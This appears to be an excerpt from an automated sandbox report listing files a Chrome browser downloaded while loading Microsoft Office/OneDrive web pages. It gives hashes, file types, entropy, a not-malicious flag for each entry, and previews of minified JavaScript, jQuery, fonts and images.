                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[28],{2885:function(e,t,n){n.d(t,{a:function(){return a}});var a={Schema:4}}.,3521:function(e,t,n){var a=n("tslib_102"),i=n(119),r=n(2885);function o(e){return!!e.fileHandler}function s(e){return o(e)&&!!e.promoted}function c(e){return o(e)&&!!e.builtIn}function d(e){return o(e)&&!!e.hidden}var l=/^(?:data|blob|javascript):/i,u=/^(?:data|http|https):/i;function f(e){return!l.test(e)}var p={svg:!0,png1x:!0,png1_5x:!0,png2x:!0};function m(e){var t,n;if(e)for(var a in e)if(p.hasOwnProperty(a)){var i=(n=e[a])&&u.test(n)?n:void 0;i&&(t||(t={}),t[a]=i)}return t}function _(e){return{file:e.file,folder:e.folder,allowMultiSelect:e.allowMultiSelect}}var h=function(){function e(e,t){this._dataRequestor=t.dataRequestor,this._prefetchCache=t.prefetchCache,this._localFileHandlerProvider=t.localFileHandlerProvider}return e.prototype.getFileHandlerData=function(e){return(0,a.Zd)(this,void 0,void 0,function(){var t,n,l,u,p,h,b
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):42254
                                                  Entropy (8bit):7.963064331425086
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:60AF105AB6B630452B06D6DDA4B0BE74
                                                  SHA1:920F5FC2CA2058928738C1695504B23704C794A9
                                                  SHA-256:3FC627E56349201333E6C39A44036B5CF09AD9378E46782098505EDB037BA104
                                                  SHA-512:7A8B15D66D4D3D65037170599BF6C961FEA777F1D74685852AB8E18D9402145E1271561EB1AA7E9CB403A01C72BD195BB97F4EBABA1610D5A15942B57780357D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_filter_v3.webp
                                                  Preview:RIFF....WEBPVP8X..............ALPHy|.....m.HI........g..ef.v.2....I.J..!L..Nx.u....r_=|T.%I.j.m..>....L...4...kM..>jm}.u.m..."b.....mm[...}..f.".,9M{.5.r,.G._....Y........E..0..9.........$K;..d.....X.L..?....bJ...p2..>...ydUe..aDL...................x.K.B...k..i...n..oJc..d..-_m4-..~f..e...!&&.s.~..i.}.y=b...i..e..\..k...v.......lyl..Nf..5/...b.W_nZ.{.{..@f...i.m..e^....<f..%..1k.5............9&.sh.o...Zs_L...Zk..n......c7!V.. ..I.H&...L.Q0.@.s.a...0`...MA0.L..&..rc.<lB..q9..e..X`0..3..a..;^.,....iH.r.w.K....f.Xf........L..@B..... N...$y...E..,....W>..&...@.0.......$)I..!s.........W<....b$.\6$..........[.e....Q....rc.$.0...H.!yP..!5L.'H.2....M.1D..'.....`H.....`...*!...6! ..a,#.X......_.dY...4..$..0LB....(....&F.X..,...YlI..&.E..] A ..xPH..0..K..V..|....-#..h..,+.6..5H..@ A..v%.....$DB.A...U..... .k.,#.In.!.$..jv.`.{.>..Sa..). 2b....`..A.._.dYF..qQ.0...l..9..v....i0.c.c........q/.AC#,dY.aY..,..[...K.......@.d.s....\......xs:.W=-..x,..W....0......`..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (9848)
                                                  Category:downloaded
                                                  Size (bytes):10969
                                                  Entropy (8bit):5.469391017052839
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E14627307D2CD849E7D11008BED53618
                                                  SHA1:52300A7E361A8678A27B0A67E6C4E6871E459117
                                                  SHA-256:C275D24C7D1AB3E84314EEF5AB4C4CD7B032BF7910D51C0DC1F010E82B776AD9
                                                  SHA-512:0917F12EB12097B9153AA7B2B38A08B0388E3E711C733D76699E708C04793FEA06CFFFD3A0E53C45A00C44BEA1ADDB56E542613BC03BDBE373575C5D090B1D7F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/16.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{4634:function(e,t,n){n.d(t,{a:function(){return c}});var a=n(784),i=n(324),r=n(1971),o=n(264),s=n(3786);function c(e){if(e&&0!==e.length){for(var t=[],n=0,c=(0,s.a)(e);n<c.length;n++){var d=c[n],l=d,u=!1;(0,r.a)(l)&&(l=(0,r.b)(l),u=!0);var f=i.a[l];"number"==typeof f&&f>0?t.push(u?-f:f):"folder"===l?t.push(u?i.a["!folder"]:i.a.folder):"media"===l?t.push(u?i.a["!media"]:i.a.media):"onenote"===l?t.push(u?i.a["!onenote"]:i.a.onenote):t.push(d.toUpperCase())}return(0,a.d)({filters:t},{fileTypeIconMap:o.a})}}}.,4632:function(e,t,n){n.r(t),n.d(t,{constructGetItemContext:function(){return z},constructGetItemSetContext:function(){return j},getContentTypes:function(){return G},getFolderContentTypes:function(){return K},getItemContextPostDataContext:function(){return V},spDataSourceConfigurationFacet:function(){return s.rd},spPrefetchDataConfigurationFacet:function(){return s.kd}});var a=n("tslib_102"),i=n(22),r=n
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (12800)
                                                  Category:downloaded
                                                  Size (bytes):3084392
                                                  Entropy (8bit):5.409149056070838
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:455374DF0895C74B03086DACA72DD127
                                                  SHA1:2B82278254E43293342C1E4B4D3703EFEFBF1B8C
                                                  SHA-256:ECD13F6A82F8248C276553DDC9579DD0F540D03FBCC695C9EB71DE124310E412
                                                  SHA-512:A5F071AB718026165DA7140152B54EC508B0665F4EBE53904A511C0EFA696DEF67E78883257715CE407F5858C38FDD48E4EDDDCA6F27B40ACA4ACBC9DD1F5129
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/odblightspeedwebpack.js
                                                  Preview:/*! For license information please see odblightspeedwebpack.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odblightspeedwebpack"],[function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return d},c:function(){return c},d:function(){return s}});var a=n(14),i=n(808),r=new Map,o=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);r.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=r.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=this.id;if((0,i.a)()){var n=JSON.stringify(t);this.unpack=new Function("t","return t[".concat(n,"
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 17724, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):17724
                                                  Entropy (8bit):7.980344924551899
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1CBD0775F4DC387F389A6EE4A3257463
                                                  SHA1:14C989A6C053FBC7797264C671FE6DB2020EF913
                                                  SHA-256:B1AAA4BA52ADC597DBB8D73FA4CCFCA99CC45134B0D1E49DF3712CF675E7189A
                                                  SHA-512:F49087AAF5EB704DB3C7218BD0BE87B03A61D647B8D1D5903C9CCBFAB372811F5B56F4981F4DBE4870005AB7D78060DB022893261E3DED7650E2C8948FF989C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-9-e252879f.woff
                                                  Preview:wOFF......E<......wx........................OS/2.......G...`4.u.cmap...P...!....@.9.gasp...t............glyf......=o..g.G...head..?....5...6#.hhea..@(.......$....hmtx..@H...W.....^..loca..@............maxp..Al....... .t..name..A........O..R.post..E(....... ....x.c`a..8...........L..t.!.I.(......@9......VP`pxs....0.B2..@x....]5.z.x....+.q......qY...(I~\........r.HI..n......\..Z_.....FBN.O[..qy.y....U...I.;D.).I.r...=+.. ......bh^)Tt.C/...Nv......G.c....8...r.!...MF....y....0.....[.....X...m.1.....3.u..j.5.l1Zr...:.u.+...~..-...Kw...|.&..F<k.G<......p.....`.i...$B8.. ...........$"...aw...Z.r.J....k..................x..}.|....V+Y...uY.|I.%K.!..._I|$N.;v.."79.I8r.%\..)!@....... ..Ii).o9[hK.......fV..'}.....D{.....w..l....@v......r6..q6.uq;...l.?.l.-.$...........!p#.a...r..T..$G..2C|.qZ5.....:h.t.*R..n.J..*.)....l:..n.2.....Z.@.?.ZT<m8..%8.C..iA.d*.Z..[.*c.h.6$..[.P..,.^..%.A...ZG.a..}..\.GQ.e.....,..........!?}.7?.{.}....B`xZ1#......Sr6#..m.}.5..2.V.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15504, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15504
                                                  Entropy (8bit):7.972402117738599
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9CA7D978289807BAED4A0E2D5DFE9E52
                                                  SHA1:68531E057084AEE10B375AC09A591CFBB006AF1F
                                                  SHA-256:DFCF7EC4962268B8D3F26C1A2A32536200D6E8D477DBAAC57C20B6F5D15406C8
                                                  SHA-512:FE3E62E975BB11AF7942263163202ABF59153472C5C1F55118D15CAC87DAA66395385A8DAF68AE871ECE8EAC3B92526F178D3B65D3511258CAD6DE4E4E42DE91
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-1-d1bde837.woff
                                                  Preview:wOFF......<.......z,........................OS/2.......G...`+.uBcmap...P.......:o.:.gasp...4............glyf...@..5...k@.5..head..7H...6...6#...hhea..7........$....hmtx..7....Y.... t..loca..7..........W..maxp..8........ .|..name..8........O..R.post..<|....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px...1...!...X <....G....x...-K.a...s;..........M."...f...f.t...`p.e8.lS..DD0[...Y...{./....9\......Kd.os3.......6oC6@.Q..g..S.2....g.-..a."{.s...T.R..-MZ.ql.#...`L{#....l...`...Ko\..hX_z.:.P[...u.'=.A...u5u.5]...Uu.E.}NR.........O.I.t................x..}.|[.......-K.fK.,Y..U^dY.-;.....NL ..)...@^ lIXJ....$.....tZw%.7S..m`.0.v:..WfJ...{..OO.e...~......{..,..{O.G.#DwL.Gx".B.^..5{u....By!.5a..qa...x.p.@....l..KC\..S.F......F.9..[.......q..v..0r..7.....k.F..w.....8r.|..}`|.....&.9.k.u..?..=p..5.'....S..J|Q....^...?}..UF..k....5X.z....s.<.f.{.g.._;..qD=W.$...Q2.2.....n...7.n..A.u>/.c3J......."..9.....t......u7=..+.|........}.+...|..(..B%.<dQ.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (64938)
                                                  Category:downloaded
                                                  Size (bytes):262478
                                                  Entropy (8bit):5.5972655113512255
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2DC64615756436755D760340264F8A69
                                                  SHA1:1E717BCDC3FDE55E06CBA3D388A379B265204EF3
                                                  SHA-256:AF0AE5C2AA1BD929249A23CD0737F7B004AAB679ED0C90C5B3F3F3BAE4437468
                                                  SHA-512:18E79C00C28E91CFC1C35E633F8809A239410347767C8F9FC3115C704422AD76DC03297EB2A39F158D71C413F27B175BBA354FAD5D9DC2020F22E6139A65FB3B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/custom-formatter/custom-formatter.lib-d0234506.js
                                                  Preview:/*! For license information please see custom-formatter.lib-d0234506.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["custom-formatter.lib"],{cfmt_180:function(){!function(){"use strict";!function(){if(void 0===window.Reflect||void 0===window.customElements||window.customElements.polyfillWrapFlushCallback)return;const e=HTMLElement;window.HTMLElement={HTMLElement:function(){return Reflect.construct(e,[],this.constructor)}}.HTMLElement,HTMLElement.prototype=e.prototype,HTMLElement.prototype.constructor=HTMLElement,Object.setPrototypeOf(HTMLElement,e)}()}()}.,"custom-formatter-lib":function(e,t,n){"use strict";n.r(t),n.d(t,{APPROVALSTATUS_FIELD_NAME:function(){return Ur},ATTACHMENTS:function(){return Er},AVERAGERATING:function(){return wr},AllowEmbedding:function(){return Ko},BOOL:function(){return pr},CF_WRAPPER:function(){return cs},CHOICE:function(){return fr},COMPUTED:function(){return Ir},CONTENTTYPENAME:function(){return Dr},CURRENCY:function(){re
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5768)
                                                  Category:dropped
                                                  Size (bytes):14831
                                                  Entropy (8bit):5.326319093945959
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1506464F8DEDE795526A2FFFD00CA20B
                                                  SHA1:5C0521A4CCBD1F7E175354C38066FFCF7DB12BAD
                                                  SHA-256:957B7F7B5A7CD1D30A32B212BA54650182EFD905F171E0327EDF5A9901F7EC0F
                                                  SHA-512:5F0FC01E2596BE7463518780A7A56129E295684A4B9538CFDC518C0BB33DC73EED24257F38157CD1B1CA8A82F1C50DEF82992F507DE75B8C6D1396C9D2BE9D1B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:/*! For license information please see 2.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{4160:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("react-lib");function i(e){const t=a.useContext(e);return!!t.version&&-1!==t.version.current}}.,8032:function(e,t,n){n.d(t,{a:function(){return C}});var a=n("react-lib"),i=n(498),r=n(237),o=n(8033),s=n("fui.core_351"),c=n(128),d=n(220),l=n(382),u=n(8020);const f=(0,s.pOW)("r6pzz3z",null,[".r6pzz3z{overflow-y:hidden;overflow-y:clip;scrollbar-gutter:stable;}"]),p=(0,s.pOW)("r144vlu9",null,[".r144vlu9{overflow-y:hidden;}"]);var m=n(160),_=n(159),h=n(8022),b=n(8029),g=n(8031);const v=[{opacity:0},{opacity:1}],y=(0,b.a)({enter:{keyframes:v,easing:g.a.curveLinear,duration:g.a.durationGentle},exit:{keyframes:[...v].reverse(),easing:g.a.curveLinear,duration:g.a.durationGentle}}),S=(0,s.pOW)("r1svjbtt","r131yuoq",{r:[".r1svjbtt{inset:0;padding:24px;margin:auto;border-style:none;overflow:unset;bor
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):2963
                                                  Entropy (8bit):4.649312539354094
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:36059870822158B1864FC56571002368
                                                  SHA1:BD5C99E386CCCCEAC51AFC613205C24854F013DC
                                                  SHA-256:BF648FE992EF479730107B0E7AC3BD09DA6FAD43E4266A1B58F5967F15C0E3A6
                                                  SHA-512:C769F6405C2B4F95C08DAF6104DD6A78385E7C02312458CC199ED3B89E183AA86B053FC2ADAA17694C7D748ABC4D80AF8B50B208FD780DFFAFB84D4DBA31EF65
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_result.svg
                                                  Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M27.4 44.8C37.0098 44.8 44.8 37.0098 44.8 27.4C44.8 17.7902 37.0098 10 27.4 10C17.7902 10 10 17.7902 10 27.4C10 37.0098 17.7902 44.8 27.4 44.8Z" fill="#E1DFDD"/>..<path d="M64.3004 98.8C83.8513 98.8 99.7004 82.9509 99.7004 63.4C99.7004 43.8491 83.8513 28 64.3004 28C44.7495 28 28.9004 43.8491 28.9004 63.4C28.9004 82.9509 44.7495 98.8 64.3004 98.8Z" fill="#C3F2F4"/>..<path d="M30.5 53C32.7 54.1 35.3 54.7 37.9 54.7C47.5 54.7 55.3 46.9 55.3 37.3C55.3 34.6 54.7 32 53.6 29.8C42.6 33.2 33.9 41.9 30.5 53Z" fill="#7BDDEF"/>..<path d="M103 40.7C90.1 19.4 62.4 12.6 41.1 25.5C19.8 38.4 13 66 25.9 87.3C38.8 108.6 66.5 115.4 87.7 102.5C109.1 89.7 115.9 62 103 40.7ZM80.9 91.2C65.9 100.3 46.4 95.4 37.3 80.5C33 73.4 31.8 65.3 33.4 57.8C35 49.3 40.1 41.7 48 36.8C63 27.7 82.5 32.5 91.6 47.5C96.4 55.4 97.4 64.6 94.9 72.8C92.8 80.3 88 86.9 80.9 91.2Z" fill="#FFD590"/>..<path d="M116 123.9L84.5 92.6
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (23196)
                                                  Category:downloaded
                                                  Size (bytes):76906
                                                  Entropy (8bit):5.545822948896733
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5F9C404E4B0B2E5567FC14AD9C75815A
                                                  SHA1:A07653C19B72439D44CC63E2BD2DB2CEE8167B68
                                                  SHA-256:58FF2603E5D0F3236DACFD994A96D00D19885E8FB1D9C3E1355286256DC839E8
                                                  SHA-512:C7E7D803E9BA1E967506723E83092CFD6EC7FE633314661ECBC62FA80A9B73E16393CF84678CEAF23AC9AD8112EA3D2B5BB6EA3B72C1390117B0CBC4A61C18C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/99925.js
                                                  Preview:/*! For license information please see 99925.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[99925],{211065:(e,t,n)=>{function a(e){for(var t,n=0,a=0,i=e.length;i>=4;++a,i-=4)t=1540483477*(65535&(t=255&e.charCodeAt(a)|(255&e.charCodeAt(++a))<<8|(255&e.charCodeAt(++a))<<16|(255&e.charCodeAt(++a))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(i){case 3:n^=(255&e.charCodeAt(a+2))<<16;case 2:n^=(255&e.charCodeAt(a+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(a)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)}n.d(t,{Z:()=>a})}.,230985:(e,t,n)=>{n.d(t,{BK9:()=>r,Ee2:()=>a,Ej2:()=>l,F5e:()=>o,GK8:()=>u,H1R:()=>_,KaI:()=>i,PG3:()=>m,YdH:()=>s,e2Z:()=>d,iNZ:()=>p,mlP:()=>c,wg7:()=>f});const a="Enter",i=" ",r="Tab",o="ArrowDown",s="ArrowLeft",c="ArrowRight",d="ArrowUp",l="En
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (18736)
                                                  Category:dropped
                                                  Size (bytes):21699
                                                  Entropy (8bit):5.438563257308618
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F991751401448862F2A111E3DECD95FF
                                                  SHA1:E7F1658BF565B88551EA6AB95AF5C05D56464F39
                                                  SHA-256:0AA6E65C637E26D48E0567EEC7E149870C0E391B2E0EFB5CF1B46DDA7BDCB1AC
                                                  SHA-512:196F6995AF35B5D3CFDAE3E95D7285ECD4D9B365CE16580147DC68100E6B58EDA1E1F2CC47CB10D4EF992A49F3C40FA32CD9E4A89D64474254CC7E45A84AE96C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19],{3811:function(e,t,n){var a,i,r;n.d(t,{a:function(){return a},b:function(){return i},c:function(){return r}}),function(e){e[e.regularUser=0]="regularUser",e[e.externalUser=1]="externalUser",e[e.group=2]="group",e[e.application=3]="application",e[e.linkedinUser=4]="linkedinUser"}(a||(a={})),function(e){e.graph="graph",e.sharepointSearch="sharepointSearch",e.substrate="substrate"}(i||(i={})),function(e){e.unified="unifiedGroup",e.securityGroup="securityGroup",e.SPGroup="SPGroup",e.PublicDistributionList="PublicDistributionList",e.family="family"}(r||(r={}))}.,7930:function(e,t,n){n.d(t,{a:function(){return C}});var a=n("tslib_102"),i=n(3811),r=n(326),o=n("odsp.util_460"),s=n(79),c=n(888),d=n(2646),l=n(20),u=n(2615),f=n(499),p=n(222),m=n(1762),_=n(3397),h=n(1262),b=n(7931),g=n(54),v=n(10),y=n(211),S=!o.HW.isActivated("b7426b02-fdf6-4c5e-9809-e0c21db41db7","07/10/2022","remove hard code graph endpoint and rea
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15284, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15284
                                                  Entropy (8bit):7.974395647957138
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4F8DB599726C67A1F2148A89CCEF0E4E
                                                  SHA1:6F8768D2D509951274C67E80306445457F5943E2
                                                  SHA-256:A9663A3528ACB5A6463AAE06515A87F48EAB595ECD4CAFEBD582EEDBFC28F525
                                                  SHA-512:C95C0859713DA78FB4487026A7BCD330D662C97260F133CE7F2CA8BDCF6242C563CE5CFB11B606122E51FEB04786C2F9B1A970C847304472C1CDD54175F4C548
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-17-8db36f62.woff
                                                  Preview:wOFF......;.......d.........................OS/2.......G...`0.s.cmap...P.........q.gasp................glyf......4A..V....head..6X...5...6K...hhea..6........$7.0!hmtx..6....k....-A.Kloca..7..........<.*maxp..7........ ....name..7........O..R.post..;........ ....x.c`.c......j.r...a&.f:..$...bdb..........+(08...U.....`u,...........x.c```f.`..F..x..1..,........%.b.../......./K....../[...r../..<...+.W.._E..}U.........c6T./..:.}9.....o....\_E..../.#T.............].]...].......................Z..#..z....`;U...............x..|.|.....h$.-.e.-[.%y.dIv..I...8....&!$......VvB $.@[......(..J.....W(..P^.Kl..;..%P.....l.....s.9.s.....$D.%o$"Q..V.UvY].H.8>:^xR.._.xK.iB..?F.%~.....|o.&.w...|......?7>.5...j.I.V.Q...A...+(.>,.....:.59E.u.....(.A.#.:.qx..."...{...>...V.FsF..+.z#...C4..G{......y..w.k.~....Z..!.*..#oC....`.Y^%.7..^..1#V.:.~dJ~J...H4.....q{...vB....q#SV>.y...\.~:X.^.n.sc.=...T....T.#.d.YL.&...qxT.$.....(../.<..=....8.c|.1.g.*~.'}..K).w...........2..X..l.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):636543
                                                  Entropy (8bit):5.314840588315181
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BAB5B1054A74820A46A7EDF0EB6B707B
                                                  SHA1:7BD50FD914533052AC87EE9ABED3DFD4245FB133
                                                  SHA-256:67F91EA548A886B1FFBA013494789AD153B0847C9D0C8B122235836B69957822
                                                  SHA-512:B802CBFFC215ADFD45BABD9004FD94AB4C0D02D5C3A18714D570372B8FDFFA2B5D198EF5CB8FCC2A1E5B08A0B9141699B688F75B728A9D87D1E5A7D59DBE44E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components/fui.lco-23212c5e.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lco"],{"fui.lco_496":(e,t,n)=>{n.d(t,{IkT:()=>qf,pzV:()=>Jd,JK0:()=>Pa,Fbi:()=>Fl,GKf:()=>wa,v6w:()=>Oa,m0G:()=>Zd,A8$:()=>el,sES:()=>gf,vr3:()=>Ds,oKI:()=>_s,cAF:()=>Mo,ydh:()=>Sg,lkX:()=>yg,v3M:()=>vs,S_D:()=>_1,Toz:()=>g1,hs9:()=>b1,TKj:()=>Rp,tQv:()=>jr,YHK:()=>Tu,OoB:()=>tu,_gz:()=>Yl,iri:()=>$l,MLw:()=>su,VYB:()=>Wl,muI:()=>ql,JrC:()=>wu,M_L:()=>Gl,_zj:()=>Lu,jX1:()=>Iu,Y2_:()=>xu,xcR:()=>Hu,mIz:()=>Wa,KqL:()=>xi,udW:()=>br,TpI:()=>Jh,tp7:()=>yp,rCD:()=>Ip,k84:()=>Cp,vq1:()=>Sf,Exo:()=>ip,Xu3:()=>Af,CCz:()=>mp,O$y:()=>S1,bnW:()=>x1,g5H:()=>ep,NPU:()=>np,_WT:()=>Zf,tNL:()=>Qf,W5Y:()=>tp,NF1:()=>vo,sIi:()=>es,M$0:()=>Co,cYW:()=>Nr,llj:()=>m,pZ2:()=>eo,A55:()=>Xr,jo4:()=>xo,v2H:()=>us,L$c:()=>Ui,WfK:()=>oo,HkY:()=>ro,bCl:()=>io,Iqq:()=>xe,Qwj:()=>Me,gkY:()=>tl,EAn:()=>dl,QiW:()=>Ap,JaD:()=>cl,ZRG:()=>sl,d2y:()=>Gc,W3S:()=>Lp,$Hj:()=>Gd,ijR:()=>jd,ECZ:()=>ks,BGu:()=>pc,Cgw:()=>Xp,kgm:()=>em,e7h:()=>am,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7060)
                                                  Category:downloaded
                                                  Size (bytes):12989
                                                  Entropy (8bit):5.349290970889558
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EAF06FEEF809C7DC01F1C42449CF2F87
                                                  SHA1:BF1D6A16E159F2B96B59C431DEBC98D23EEDCA41
                                                  SHA-256:E6797447E65AED4B7D14FFBF841ADEF7DAAE3219A3A1C1734330CDCE5E7EED2F
                                                  SHA-512:2A1EE394923714648CAD4D41A595B69E71C51FFAB7C88EEA38C7E8B28707CD60FCFC62A1807BCE060F52635B0CE0ACB8469D6472998FB4447C3F95BCD5C26413
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/5.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[5],{8016:function(e,t,n){n.d(t,{a:function(){return E}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(33),s=n(141),c=n(8017),d=n(4131),l=n(192),u=n(127),f=n(974),p=n("fui.util_369"),m=n(459),_=n(4722),h=(0,o.a)(),b=r.createElement(_.a,null).type,g=function(e){function t(t){var n=e.call(this,t)||this;return(0,u.a)(n),(0,f.a)("DialogContent",t,{titleId:"titleProps.id"}),n}return(0,i.XJ)(t,e),t.prototype.render=function(){var e,t=this.props,n=t.showCloseButton,a=t.className,o=t.closeButtonAriaLabel,s=t.onDismiss,d=t.subTextId,l=t.subText,u=t.titleProps,f=void 0===u?{}:u,_=t.titleId,b=t.title,g=t.type,v=t.styles,y=t.theme,S=t.draggableHeaderClassName,D=h(v,{theme:y,className:a,isLargeHeader:g===c.a.largeHeader,isClose:g===c.a.close,draggableHeaderClassName:S}),I=this._groupChildren();return l&&(e=r.createElement("p",{className:D.subText,id:d},l)),r.createElement("div",{className:D.content},r.createElement("d
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (21024)
                                                  Category:dropped
                                                  Size (bytes):24366
                                                  Entropy (8bit):5.195178922510299
                                                  Encrypted:false
                                                  SSDEEP:
